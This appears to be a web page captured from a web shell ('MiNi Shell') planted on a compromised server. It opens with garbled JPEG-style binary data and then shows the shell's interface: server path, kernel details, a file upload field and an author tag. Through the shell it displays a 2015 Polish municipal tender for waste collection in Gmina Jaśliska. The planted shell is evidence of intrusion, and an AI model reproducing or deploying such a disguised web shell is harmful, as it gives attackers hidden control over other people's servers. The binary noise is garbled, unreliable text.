JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151208/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151208/334576-N-2015.html

<p class="kh_header"><b>Jaśliska: Odbiór i transport odpadów komunalnych niesegregowanych z terenu Gminy Jaśliska
Odbiór, transport i zagospodarowanie odpadów komunalnych segregowanych z terenu Gminy Jaśliska</b><br>
<b>Numer ogłoszenia: 334576 - 2015; data zamieszczenia: 08.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jaśliska , Jaśliska 171, 38-485 Jaśliska, woj. podkarpackie, tel. 13 431 05 81, faks 13 431 05 93.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jasliska.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i transport odpadów komunalnych niesegregowanych z terenu Gminy Jaśliska
Odbiór, transport i zagospodarowanie odpadów komunalnych segregowanych z terenu Gminy Jaśliska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Odbiór i transport odpadów komunalnych niesegregowanych z terenu Gminy Jaśliska, który obejmuje: 
a) Wykonywanie usług komunalnych na terenie gminy Jaśliska, polegających na odbiorze i transporcie raz w miesiącu, w tym dwa razy w miesiącach czerwiec, lipiec, sierpień około 12 Mg odpadów komunalnych niesegregowanych tzw. Odpadów mokrych z terenu około 470 nieruchomości (gospodarstw) zamieszkałych oraz około 65 nieruchomości niezamieszkałych w których powstają odpady komunalne, położonych w miejscowościach: Szklary, Daliowa, Lipowiec, Jaśliska, Posada Jaśliska, Wola Niżna, Wola Wyżna do Regionalnej Instalacji Przetwarzania Opadów Komunalnych w Krośnie o łącznej masie około 150 Mg/1 rok.
b) Wykonywanie usług komunalnych na terenie gminy Jaśliska, polegających na odbiorze i transporcie cztery razy w roku około 8 Mg/1rok kontener typu KP-7 odpadów komunalnych  tzw. cmentarnych z terenu cmentarza położonego w miejscowości Jaśliska. 
c) Odpady niesegregowane tzw. odpady mokre, odbierane będą w workach foliowych koloru czarnego oznakowanych i z pojemników 120 l i 1100 l i zgodnie z hierarchią postępowania z odpadami określoną w ustawie o odpadach.
d) Informowanie Zamawiającego o przypadkach niewłaściwej segregacji odpadów przez właścicieli nieruchomości,
e) Sporządzanie półrocznych sprawozdań i przekazywanie ich zamawiającemu w terminie do końca miesiąca następującego po półroczu.
f) Wykonywanie obowiązków wynikających z aktualnie obowiązujących ustaw i rozporządzeń w zakresie gospodarowania odpadami.
2) Odbiór, transport i zagospodarowanie odpadów komunalnych segregowanych z terenu Gminy Jaśliska, który obejmuje: 
2.1. Odbiór, transport i zagospodarowanie:
a) selektywnie zbieranych odpadów od właścicieli nieruchomości zamieszkałych i niezamieszkałych:
- papier, tektura, opakowania z papieru i tektury, kod 20 01 01, 15 01 01;
- szkło, opakowania za szkła, kod 20 01 02, 15 01 07;
- metale, opakowania z metalu, kod 20 01 40, 15 01 04;
- tworzywa sztuczne, opakowania z tworzyw sztucznych kod 20 01 39, 15 01 02;
- opakowania wielomateriałowe, kod 15 01 05;
b) odpadów wielkogabarytowych kod: 20 03 07, zużytych opon kod: 16 01 03, zużyty sprzęt elektryczny i elektroniczny, kod: 20 01 35*, 20 01 36;
c) odpadów selektywnie zbieranych z Punktu Selektywnej Zbiórki Odpadów Komunalnych (zwanym dalej GPSZOK), kod: 15 01 05, 15 01 01, 15 01 02, 15 01 07, 15 01 04, 20 01 40, 20 01 39, odpadów wielkogabarytowych kod: 20 03 07, zużytego sprzętu elektrycznego i elektrycznego kod: 20 01 35*, 20 01 36, zużytych opon kod: 16 01 03, przeterminowanych leków kod: 20 01 32, odpadów rozbiórkowych i budowlanych kod: 17 01 01, 17 01 02, 17 01 03, zużytych olejów, farb, rozpuszczalników, akumulatorów, baterii, lamp kod: 20 01 33 *, 20 01 34, 20 01 27, 20 01 28, 20 01 21, 20 01 13 środki ochrony roślin kod: 20 01 80, odpadów ulegających biodegradacji 20 02 01. Odbiór powinien odbywać się w terminie do 2 dni od daty zgłoszenia dokonanego przez pracownika Urzędu Gminy.
2.2. Wykonywanie usług komunalnych na terenie gminy Jaśliska, polegających na odbiorze, transporcie i zagospodarowaniu raz w miesiącu:
a) około 5 Mg (łącznie około 60 Mg/1rok) odpadów komunalnych segregowanych  tzw. suchych; papier, plastik, metal, szkło, opakowania wielomateriałowe,
b) około 6 Mg/1 rok odpadów wielkogabarytowych, zużytych opon, zużyty sprzęt elektroniczny i elektryczny
 - z terenu około 470 nieruchomości (gospodarstw) zamieszkałych oraz około 65 nieruchomości niezamieszkałych a powstają odpady komunalne położonych w miejscowościach: Szklary, Daliowa, Lipowiec, Jaśliska, Posada Jaśliska, Wola Niżna, Wola Wyżna.
2.3. Odbiór, transport i zagospodarowanie odpadów segregowanych tzw. suchych zmieszanych: papier, plastik, metal, szkło, opakowania wielomateriałowe, odbierane będą w workach foliowych przeźroczystych oznakowanych kolorystycznie:
- kolor zielony - szkło;
- kolor niebieski - papier i tektura,
- kolor żółty - tworzywa sztuczne, opakowania wielomateriałowe, metal. 
2.4. Informowanie Zamawiającego o przypadkach niewłaściwej segregacji odpadów przez właścicieli nieruchomości,
2.5. Sporządzanie półrocznych sprawozdań i przekazywanie ich zamawiającemu w terminie do końca miesiąca następującego po półroczu.
2.6. Wykonywanie obowiązków wynikających z aktualnie obowiązujących ustaw i rozporządzeń w zakresie gospodarowania odpadami..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.20.00-9, 90.51.30.00-6, 90.51.31.00-7, 90.51.40.00-3, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia wg załącznika Nr 2 w SIWZ. Wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od
właścicieli nieruchomości na terenie Gminy Jaśliska, prowadzonego przez Wójta Gminy Jaśliska na podstawie art. 9c ust. 1 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2012 r. poz. 391 ze zm.),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia wg załącznika Nr 2 w SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia wg załącznika Nr 2 w SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia wg załącznika Nr 2 w SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia wg załącznika Nr 2 w SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta musi zawierać uzupełnione załączniki:1, 2, 3, 4, 5, 6, 7</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)	zmiana zakresu usług, które Wykonawca powierzył podwykonawcom a które określone są w złożonej ofercie i niniejszej umowie,
b)	zmiana zakresu usług przez wprowadzenie nowych właścicieli nieruchomości wynikająca z potrzeb Zamawiającego,
c)	zmiana podatku VAT.
d)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
e)	rezygnacja przez zamawiającego z realizacji części przedmiotu umowy ;
f)	gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jasliska.info<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jaśliska 38-485 Jaśliska 171.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2015 godzina 11:00, miejsce: Urząd Gminy Jaśliska 38-485 Jaśliska 171 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Odbiór i transport odpadów komunalnych niesegregowanych z terenu Gminy Jaśliska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonywanie usług komunalnych na terenie gminy Jaśliska, polegających na odbiorze i  transporcie raz w miesiącu, w tym dwa razy w miesiącach czerwiec, lipiec, sierpień około 12 Mg odpadów komunalnych niesegregowanych tzw. Odpadów mokrych z terenu około 470 nieruchomości gospodarstw zamieszkałych oraz około 65 nieruchomości niezamieszkałych w których powstają odpady komunalne, położonych w miejscowościach: Szklary, Daliowa, Lipowiec, Jaśliska, Posada Jaśliska, Wola Niżna, Wola Wyżna do Regionalnej Instalacji Przetwarzania Opadów Komunalnych w Krośnie o łącznej masie około 150 Mg/1 rok b) Wykonywanie usług komunalnych na terenie gminy Jaśliska, polegających na odbiorze i transporcie cztery razy w roku około 8 Mg/1 rok kontener typu KP-7 odpadów komunalnych  tzw. cmentarnych z terenu cmentarza położonego w miejscowości Jaśliska. Odpady niesegregowane tzw. odpady mokre, odbierane będą w workach foliowych koloru czarnego oznakowanych i z pojemników 120 l i 1100 l i zgodnie z hierarchią postępowania z odpadami określoną w ustawie o odpadach. Informowanie Zamawiającego o przypadkach niewłaściwej segregacji odpadów przez właścicieli nieruchomości, Sporządzanie półrocznych sprawozdań i przekazywanie ich zamawiającemu w terminie do końca miesiąca następującego po półroczu.Wykonywanie obowiązków wynikających z aktualnie obowiązujących ustaw i rozporządzeń w zakresie gospodarowania odpadami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.20.00-9, 90.51.30.00-6, 90.51.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Odbiór, transport i zagospodarowanie odpadów komunalnych segregowanych z terenu Gminy Jaśliska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.1. Odbiór, transport i zagospodarowanie:selektywnie zbieranych odpadów od właścicieli nieruchomości zamieszkałych i niezamieszkałych:papier, tektura, opakowania z papieru i tektury, kod 20 01 01, 15 01 01; szkło, opakowania za szkła, kod 20 01 02, 15 01 07; metale, opakowania z metalu, kod 20 01 40, 15 01 04; tworzywa sztuczne, opakowania z tworzyw sztucznych kod 20 01 39, 15 01 02; opakowania wielomateriałowe, kod 15 01 05; odpadów wielkogabarytowych kod: 20 03 07, zużytych opon kod: 16 01 03, zużyty sprzęt elektryczny i elektroniczny, kod: 20 01 35, 20 01 36; odpadów selektywnie zbieranych z Punktu Selektywnej Zbiórki Odpadów Komunalnych (zwanym dalej GPSZOK), kod: 15 01 05, 15 01 01, 15 01 02, 15 01 07, 15 01 04, 20 01 40, 20 01 39, odpadów wielkogabarytowych kod: 20 03 07, zużytego sprzętu elektrycznego i elektrycznego kod: 20 01 35, 20 01 36, zużytych opon kod: 16 01 03, przeterminowanych leków kod: 20 01 32, odpadów rozbiórkowych i budowlanych kod: 17 01 01, 17 01 02, 17 01 03, zużytych olejów, farb, rozpuszczalników, akumulatorów, baterii, lamp kod: 20 01 33, 20 01 34, 20 01 27, 20 01 28, 20 01 21, 20 01 13 środki ochrony roślin kod: 20 01 80, odpadów ulegających biodegradacji 20 02 01. Odbiór powinien odbywać się w terminie do 2 dni od daty zgłoszenia dokonanego przez pracownika Urzędu Gminy. 2.2. Wykonywanie usług komunalnych na terenie gminy Jaśliska, polegających na odbiorze, transporcie i zagospodarowaniu raz w miesiącu a) około 5 Mg (łącznie około 60 Mg/1 rok) odpadów komunalnych segregowanych  tzw. suchych; papier, plastik, metal, szkło, opakowania wielomateriałowe, b) około 6 Mg/1 rok odpadów wielkogabarytowych, zużytych opon, zużyty sprzęt elektroniczny i elektryczny - z terenu około 470 nieruchomości (gospodarstw) zamieszkałych oraz około 65 nieruchomości niezamieszkałych a powstają odpady komunalne położonych w miejscowościach: Szklary, Daliowa, Lipowiec, Jaśliska, Posada Jaśliska, Wola Niżna, Wola Wyżna. 2.3. Odbiór, transport i zagospodarowanie odpadów segregowanych tzw. suchych zmieszanych: papier, plastik, metal, szkło, opakowania wielomateriałowe, odbierane będą w workach foliowych przeźroczystych oznakowanych kolorystycznie:kolor zielony - szkło; kolor niebieski - papier i tektura, kolor żółty - tworzywa sztuczne, opakowania wielomateriałowe, metal. 2.4. Informowanie Zamawiającego o przypadkach niewłaściwej segregacji odpadów przez właścicieli nieruchomości,2.5. Sporządzanie półrocznych sprawozdań i przekazywanie ich zamawiającemu w terminie do końca miesiąca następującego po półroczu. 2.6. Wykonywanie obowiązków wynikających z aktualnie obowiązujących ustaw i rozporządzeń w zakresie gospodarowania odpadami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-9, 90.51.30.00-6, 90.51.31.00-7, 90.51.40.00-3, 90.53.30.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com